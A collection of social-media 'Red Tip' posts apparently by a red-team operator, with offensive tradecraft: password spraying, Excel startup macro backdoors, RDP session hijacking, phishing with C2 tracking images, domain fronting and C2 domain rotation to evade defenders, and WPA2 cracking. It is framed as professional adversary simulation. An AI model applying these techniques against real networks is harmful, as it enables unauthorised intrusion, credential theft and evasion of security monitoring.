Took all those "Red Team Tips" and stuck it onto one page: I'll update this page occasionally
#redteam
#adversarysimulation
#cyber
Also, I want to add that there's some duplicate numbering :( Ah well...
The fuck, what kind of vulnerability is CVE-2023–24044?
You can modify the host header so that it redirects to the attacker's domain instead. What is this bullshit? How did it even get a CVE?
Red Tip
#434
: SSH Agent Forwarding can be exploited to advance your presence on a network without SSH keys or passwords.
@int0x08
has an example command snippet available at . Great for when you have a shell but no credentials.
#redteam
#cyber
#sshagent
Red Team 2.0 appears to become:
1) Give a machine on the internal network because phish fail.
2) Disable EDR because can't seem to bypass the EDR.
3) Can't figure out how to pivot network segment.
4) ...
Dude, why not just ask to be put on the core banking system?
Alternatives to the Whoami.exe command.
echo %USERNAME%
echo %USERDOMAIN%
systeminfo
wmic ComputerSystem get Username
net user %username%
query user
cd /users; dir
reg query “hkcu\volatile environment”
@LisaMayOfficial
@FightHaven
The store lost $100 in cash when the man stole the $100 bill from the register. However, when the man used the stolen $100 bill to buy $70 worth of goods and received $30 in change, the store did not lose any additional money.
So, the total amount the store lost was $100 due to…
Red Tip
#344
: Set HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0, to allow multiple sessions on a server per user. This is useful if you want to login to the jump-host, but that guy's just on all-day-long... 😶
Red Tip
#429
: Looking for login credentials? Don't forget to try default credentials other than admin:admin -> . A fantastic cheat sheet containing major default credentials to try for various products.
#redteam
#cyber
Why is Red Teaming so undervalued? Is it just me? Blue teams are implementing controls that don't work like 80% of the time for tens of millions of dollars. Yet most orgs are skimping out on paying for Red Team who's going to tell you what went wrong?
Why I quit Bug Bounty and I'm constantly being reminded:
Get paid fucking 10 USD for an Authentication Bypass + Remote Code Execution Chain, that can be used to attack their Domain Controllers.
Red Tip
#437
: Pwndrop is a customized web and webdav server that can be used to serve documents and payloads with a few extra features.
@kgretzky
made a fantastic GUI and its super easy to use! . Video at
#redteam
#cybersecurity
YOLO, I joined Cyber not even knowing how the TCP stack really worked, or how IP Networking worked. University was all text books.
OSCP just pushed me into more practical execution and understanding through testing / trial and error.
Red Tip
#345
: When placing Excel Macro backdoors into Excel startup, you don't have to name it Personal.xlsb, you can also call it a.txt. It'll still start up upon opening of Excel. 😊... Bonus point for sticking it into Roaming profile.
DevTunnels, blue are going to begin searching for . Get ready ahead of time and use domains like:
global.rel.tunnels.api.visualstudio\.com
tunnels-prod-rel-tm.trafficmanager\.net
*.app\.github.dev
Neat command from Ippsec :D
find / -newermt "2021-02-12" -newermt "2021-02-19" -ls| grep -v ' /etc\| /var/lib\| /sys\| /proc\| /boot'
It finds files from when a box was created then finds stuff the author of a box planted for the CTF :D
Red Tip
#427
: Directory discovery for all your URLs in one command, formatted to a nice HTML file for browsing. You can try other formats for grepping etc.
ffuf -w targets-alive.txt:URL -w wordlist.txt -u URL/FUZZ -mc
200,403 -o targets-report.html -of html
#recon
#cyber
Red Tip
#425
: CVE-2020-16938 allows privileged file read by EVERYBODY according to
@jonasLyk
You can PoC using 7zip and navigating to the device path \\.\PhysicalDevice0\Basic data partition.img\Windows\System32\Config\
#redteam
#cyber
Red tip
#325
: WPA2 PSK can be cracked on Hashcat too, just in case you were not aware. All you do is make cap2hccapx then convert the handshake CAP file to HCCAPX then crack it in Hashcat mode 2500 :)
Red Tip
#337
: Have a low privileged Office365 account? Pivot over to after logging in and you can access the Azure AD. If they're syncing AD you suddenly get to view all the groups. Also check out Azure CLI. From
@ustayready
's
@WWHackinFest
talk!
Red tip
#303
: Look for open S3 buckets using I found 1400 buckets in about 1 hour. Good practice to make sure your client isn’t vulnerable to such attacks and if In red team you might be able to use it to serve payload stages or create waterhole attacks
Red Tip
#435
: Found GitLab but no credentials? That pesky sign-in page is blocking you off? Try navigate to /explore or /explore/snippets to see if there's anything useful.
#Redteam
#GitLabSnippets
Red Tip
#421
: Do you know how to trivially & remotely hijack an
#RDP
session without prompt nor warning on user’s side using
#Microsoft
signed binary (no patch/multi-session) ?
qwinsta+mstsc shadowing is the answer ;) Details:
@kmkz_security
Red Tip
#343
: When working with Google Drive documents, if it asks you to request permission, you can try. However, you can also try sticking /pubhtml at the end to see if they've published a copy that you can view.
Red Tip
#436
: ProjectDiscovery have a tool called Nuclei which has constantly community-updated signatures which help to quickly identify the low hanging fruit and fingerprint a perimeter if you don't want to go full on vulnerability scanner:
#cyber
Red Tip
#415
: STATUS_PASSWORD_MUST_CHANGE when trying an AD account? Use “smbpasswd -r domain.fqdn -U username” to change the password so you can use the account.
#cyber
#redteam
Red tip
#328
: Need to Spray Office365? Use . Tried and tested this tool and works really fast and well in Python. Just do --threads 3000 and --password Welcome1. As all operators know, you don't have time to be testing tools in the middle of a gig. :)
Red / Blue Team Tip: If you're still reading e-mail message headers using Notepad, you're doing it wrong. Check out Message Header Analyzer:
It'll save your eyes 🤯
#cyber
#redteam
#blueteam
#suspiciousemails
Getting started with Threat Hunting:
1) Install Splunk
2) Sysmon all the endpoints using GPO
3) Send all logs to Splunk using Sysmon TA
4) Run saved queries :D
Red Tip
#423
: Escalate privileges on a Windows system if you have any of the following privileges.
SeImpersonate, SeAssignPrimary, SeTcb, SeBackup, SeRestore, SeCreateToken, SeLoadDriver, SeTakeOwnership, SeDebug
@elc0rr3Km1n0s
#cyber
#redteam
Ransomware defense. Every EDR company telling people to install EDR but in reality their EDR probably won’t even detect AnyDesk. You should be red teaming instead.
Red Tip
#402
: Need to proxy Linux tools? Proxychains4. Need to proxy Windows tools like ADExplorer or Remote Desktop? Try out Proxycap, Proxifier.
#cyber
#operations
#redteam
Neat trick with Windows when you want to leave SSH tunnels in the background.
#bash
#screen
-S tunnel
#ssh
-L 8080:localhost:8080
Close terminal. Stays running :)
1. The cloud is just someone else’s computer.
2. When that someone tells you they can’t view your data, all they mean is they have a rule to say they shouldn’t. Rarely a technical control to prevent it.
Red Tip
#404
: Perform easy phishing campaign and obtain a list of users who clicked. Send a follow up email from a training platform and ask them to perform their awareness training by launching an application. Idea is that multi-stage phishing is more convincing.
#cyber
#redteam
Using CloudFlare for IP address filtering in Red Team Operations:
Wrote it up for reference, and because CloudFlare is pretty awesome. You can also play around with the other features! 🔥 (cc
@curi0usjack
,
@shantanukhande
)
#redteam
#cybersecurity
Red tip
#320
: List Chrome bookmarks with one line:
type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
Thank
@francisacer1
for the path to Bookmarks.bak :D
Red tip
#310
: SOC is looking for low user/access count new domains that haven't been seen before and you can't domain front due to RFC2616 proxy? When doing the phish, add invisible image links to your C2 domain so that multiple users will have loaded the C2 domain before use.
Red Tip
#422
: Identify if a certain domain is hosted on s3 bucket by requesting ‘/%C0’. It’ll spit out a 400 bad request if it’s an S3 bucket with a similar message as shown in the screenshot.
#redteam
#cyber
Red tip
#282
: Although I thought it was clear as Microsoft documented it but LAPS passwords are in clear text to users that have the right privileges in AD. Friendly reminder :) Either just browse LDAP or or
@harmj0y
@kfosaaen
A new update to the ATT&CK Group to Technique repository!
@msgeekuk
has given us a lot of fancy changes in the Spreadsheet, and we also have color coding. Get the repository at
I've got to say but one of my favourite commands to date is: powershell Get-WmiObject -Class MicrosoftDNS_AType -NameSpace Root\MicrosoftDNS -ComputerName DCNAME
[NEW POST] HAMMERTHROW: Rotate my domain. Automating the process of changing staging and beacon domains in
@armitagehacker
's CobaltStrike. This makes it more difficult for defenders to detect all domains in use.
#redteam
Red tip
#274
: Password cracking is hard. I love Top297Million-Probable, rockyou was decent for a quick smash, but lately found out about Keyboard Walks. Add keyboard walks with rules into your cracking routines to get more hashes cracked! Share your ideas!
Given the feedback from some of the companies who run the products on the list, here’s a revamped version without certain products. Let’s hope everyone can learn to maximise coverage using multiple products or understand the scope of their EDR’s coverage. Cc
@MrUn1k0d3r
#redteam
ThreadStackSpoofer - a PoC for advanced in-memory evasion technique by
@mariuszbit
. Worth following his work as he releases a lot of PoC and tooling for the latest techniques and concepts! 👇Check it out here: 🤯
#redteam
#OST
How do you prevent a zero day exploit attack? You don't. You block the next step of the attack to minimise the impact of the zero day. If you have many layers of controls, it minimises the impact of the zero day. Good network segmentation and endpoint / server controls etc.
Red tip
#284
: Windows Credential Vault is often used to store saved passwords.
@_rastamouse
walks us through the decryption procedures required to make use of these credentials in his blog post at !
[NEW POST] For the
#RedTeam
who use CloudFront for Domain Fronting. Similar to Aliyun, set arbitrary host headers :) Check this out. As always, I confirm any techniques and findings using
@armitagehacker
Cobalt Strike. cc
@bluscreenofjeff
@001spartan
Red tip
#315
: If you HAVE to spray for creds, use Kerberos spraying as pointed out by
@ropnop
that the level of auditing is far less by default and does not log invalid attempts.
Why I see myself as a hacker more than a developer. Part 1.
1) I write code that barely works, not factored, not optimized.
2) I write obfuscation better than I write code.
3) I still can't get a proper UI going.
4) My code achieves the task, only.
Red tip
#321
: Want to find out if the current network has an external exposed interface? Eg. Wireless networks? An easy way is to visit on port 22,80,443 for a quick idea. You might find that your current network has another way in!
New blog post on using Alibaba CDN for domain fronting, and some of it's benefits.
#redteam
#security
My examples use
@armitagehacker
's Cobalt Strike, but you can use any other C2 software.